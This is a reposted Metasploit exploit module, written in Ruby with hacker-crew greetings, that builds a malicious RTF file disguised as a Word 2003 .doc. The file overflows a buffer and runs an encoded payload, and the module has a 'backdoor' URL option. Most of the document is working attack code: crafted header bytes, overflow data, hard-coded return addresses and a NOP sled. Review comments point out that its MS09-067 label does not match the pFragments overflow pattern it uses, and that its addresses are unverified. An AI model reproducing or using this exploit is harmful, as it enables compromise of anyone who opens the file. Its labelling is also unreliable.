Microsoft Office 2003(.doc)命令执行及本地溢出漏洞

    ###
    # Title : Microsoft Office 2003 (.doc) Command Exec and local BOF (msf)
    # Author : KedAns-Dz
    # E-mail : ked-h@hotmail.com (ked-h@1337day.com) | ked-h@exploit-id.com | kedans@facebook.com
    # Home : Hassi.Messaoud (30500) - Algeria -(00213555248701)
    # Web Site : www.1337day.com
    # Facebook : http://facebook.com/KedAns
    # platform : windows ( local BOF via MSF)
    # Type : local exploit / Buffer Overflow / Metasploit
    ###

    ##
    # | >> --------+++=[ Dz Offenders Cr3w ]=+++-------- << |
    # | > Indoushka * KedAns-Dz * Caddy-Dz * Kalashinkov3   |
    # | Jago-dz * Over-X * Kha&miX * Ev!LsCr!pT_Dz * Dr.55h |
    # | KinG Of PiraTeS * The g0bl!n * soucha * dr.R!dE  .. |
    # | ------------------------------------------------- < |
    ###

    ##
    # $Id: ms09_067_word_exec.rb | 01:59 25/01/2012| KedAns-Dz $
    ##

    require 'msf/core'

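    # Metasploit file-format module that writes a crafted RTF document (saved
    # under a .doc filename, which Word 2003 still opens as RTF) carrying an
    # encoded payload. This is a 2012 1337day re-packaging of an exploit-db PoC
    # (EDB-ID 18334, credited to b33f and g11tch); nothing in the listing shows
    # it was tested, so the NOTE(review) comments below flag what a practitioner
    # should verify before using or classifying it.
    #
    # Listing repairs applied here: the doubled single quotes that the page
    # extraction left in every string literal (''msf/core'') are restored to
    # plain quotes, a stray `;` in front of one statement is dropped, and the
    # reference URL gets its missing host (the original read http://exploit-db/).
    class Metasploit3 < Msf::Exploit::Remote
        # The ranking is the original author's claim; the module carries no
        # reliability evidence (single hard-coded target, no offset table).
        Rank = GoodRanking

        include Msf::Exploit::FILEFORMAT

        # Module metadata plus the two user-facing options:
        #   FILENAME - name of the generated document (default 'msf.doc').
        #   URLBD    - a URL that #exploit %-escapes and appends after the
        #              payload; nothing else in this module reads it.
        def initialize(info = {})
            super(update_info(info,
                'Name'        => 'Microsoft Office 2003 (.doc) Command Exec and local BOF',
                'Description' => %q{
                 This module exploits a buffer overflow in Microsoft Office 2003
                 and Command Exec With .doc file .
    },
                'License'     => MSF_LICENSE,
                'Author'      =>
                    [
                        'b33f',
                        'g11tch',
                        'KedAns-Dz <ked-h[at]hotmail.com>' # MSF module
                    ],
                'Version'     => '1.0',
                'References'  =>
                    [
                        # The host was missing in the original ('http://exploit-db/');
                        # the EDB-ID itself is unchanged.
                        [ 'URL', 'http://www.exploit-db.com/exploits/18334' ],
                    ],
                'DefaultOptions' =>
                    {
                        'EXITFUNC' => 'process',
                    },
                # Alphanumeric payload generated against ESI. A single quote is
                # the only declared bad character; the listing does not say why.
                'Payload'     =>
                    {
                        'Space'          => 1024,
                        'BadChars'       => "'",
                        'EncoderType'    => Msf::Encoder::Type::AlphanumMixed,
                        'EncoderOptions' =>
                            {
                                'BufferRegister' => 'ESI',
                            }
                    },
                'Platform'    => 'win',
                # 'Ret' is declared but never read: #exploit hard-codes its
                # address bytes. Kept as-is for interface compatibility.
                'Targets'     =>
                    [
                        [ 'Microsoft Office 2003 - MSWord (.doc Heap Spray)', { 'Ret' => '' } ],
                    ],
                'DisclosureDate' => 'JAN 08 2012',
                'DefaultTarget'  => 0))

            register_options(
                [
                    OptString.new('FILENAME', [ true, 'The file name.',  'msf.doc']),
                    OptString.new('URLBD',    [ true, 'URL From the Backdoor.',  'http://']),
                ], self.class)
        end

        # Assemble the RTF and write it through FILEFORMAT#file_create.
        #
        # File layout, as read off the byte strings below:
        #   1. an RTF prologue whose shape carries a `pFragments` property with
        #      a value starting `9;2;ffffffffff`;
        #   2. overflow data written mostly as ASCII hex-digit text;
        #   3. the encoded payload and the escaped URLBD, appended as raw bytes;
        #   4. a NUL byte and the closing braces.
        def exploit
            # %-escape URLBD (Rex::Text.to_unescape). It is only ever appended to
            # the file; the payload does not reference it, so the "Command Exec"
            # half of the module name is not demonstrated by this code.
            url = Rex::Text.to_unescape(datastore['URLBD'])

            # RTF prologue. Decoded it reads:
            #   {\rt##{\shp{\sp}}{\shp{\sp}}{\shp{\sp}}{\shp{\*\shpinst\shpfhdr0
            #   \shpbxcolumn\shpbypara\sh pwr2}{\sp{\sn {}{}{\sn}{\sn}{\*\*}pFragments}
            #   {\*\*\*\{\sv{\*...\*R*\*...\*}9;2;ffffffffff
            # NOTE(review): a `pFragments` shape property whose `\sv` value begins
            # `9;2;ffffffffff` is the pattern of the Word RTF pFragments stack
            # overflow (MS10-087 / CVE-2010-3333), not the MS09-067 named in the
            # $Id header of this file. Confirm which bulletin this actually targets.
            header =
                "\x7b\x5c\x72\x74\x23\x23\x7b\x5c\x73\x68\x70\x7b\x5c\x73\x70" +
                "\x7d\x7d\x7b\x5c\x73\x68\x70\x7b\x5c\x73\x70\x7d\x7d\x7b\x5c\x73" +
                "\x68\x70\x7b\x5c\x73\x70\x7d\x7d\x7b\x5c\x73\x68\x70\x7b\x5c\x2a" +
                "\x5c\x73\x68\x70\x69\x6e\x73\x74\x5c\x73\x68\x70\x66\x68\x64\x72" +
                "\x30\x5c\x73\x68\x70\x62\x78\x63\x6f\x6c\x75\x6d\x6e\x5c\x73\x68" +
                "\x70\x62\x79\x70\x61\x72\x61\x5c\x73\x68\x20\x70\x77\x72\x32\x7d" +
                "\x7b\x5c\x73\x70\x7b\x5c\x73\x6e\x20\x7b\x7d\x7b\x7d\x7b\x5c\x73" +
                "\x6e\x7d\x7b\x5c\x73\x6e\x7d\x7b\x5c\x2a\x5c\x2a\x7d\x70\x46\x72" +
                "\x61\x67\x6d\x65\x6e\x74\x73\x7d\x7b\x5c\x2a\x5c\x2a\x5c\x2a\x5c" +
                "\x7b\x5c\x73\x76\x7b\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c" +
                "\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x52" +
                "\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c" +
                "\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x7d\x39\x3b\x32\x3b\x66\x66" +
                "\x66\x66\x66\x66\x66\x66\x66\x66"

            # Overflow data. Up to the NOP sled this is ASCII hex-digit text
            # ("30" stands for the byte 0x30, "90" for a NOP), the form RTF uses
            # to carry binary inside a hex stream.
            buf = "\x23" * 501                               # 501 x '#'
            buf << "\x30\x35"                                # "05"
            buf << "\x30" * 40                               # "0" x 40 -> 20 zero bytes
            # Labelled "CALL ESP - WINWORD.exe" in the original. As hex text this
            # spells 66 43 32 30, i.e. 0x30324366 read little-endian; nothing in
            # the module ties it to a WINWORD.EXE build, so treat it as unverified.
            buf << "\x36\x36\x34\x33\x33\x32\x33\x30"
            # "0000807c" twice: 0x7c800000 read little-endian, written two times.
            buf << "\x30\x30\x30\x30\x38\x30\x37\x63" * 2
            buf << rand_text_alpha(42)                       # random alphabetic filler
            buf << "\x39\x30" * 18                           # "90" x 18 -> 18 NOPs
            # NOTE(review): the payload is appended as raw bytes, unlike the
            # hex-text fields above, and an AlphanumMixed payload contains
            # characters outside 0-9a-f. Whether the parser reaches it intact
            # needs checking against a working sample.
            buf << payload.encoded

            # Final document: prologue, overflow data, escaped URL, NUL, then the
            # braces that close the groups opened in the prologue.
            doc = header + buf + url + "\x00" + "{}}}}}}" + "\x0d\x0a" + "}"

            print_status("Creating '#{datastore['FILENAME']}' file...")
            file_create(doc)
        end
    end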

    #================[ Exploited By KedAns-Dz * Inj3ct0r Team * ]=====================================
    # Greets To : Dz Offenders Cr3w < Algerians HaCkerS > || Rizky Ariestiyansyah * Islam Caddy
    # + Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re * CrosS (www.1337day.com)
    # Inj3ct0r Members 31337 : Indoushka * KnocKout * Kalashinkov3 * SeeMe * ZoRLu * anT!-Tr0J4n
    # Anjel Injection (www.1337day.com/team) * Dz Offenders Cr3w * Algerian Cyber Army * Sec4ever
    # Exploit-ID Team : jos_ali_joe + Caddy-Dz + kaMtiEz + r3m1ck (exploit-id.com) * Jago-dz * Over-X
    # Kha&miX * Str0ke * JF * Ev!LsCr!pT_Dz * KinG Of PiraTeS * www.packetstormsecurity.org * TreX
    # www.metasploit.com * UE-Team & I-BackTrack * r00tw0rm.com * All Security and Exploits Webs ..
    #=================================================================================================
     
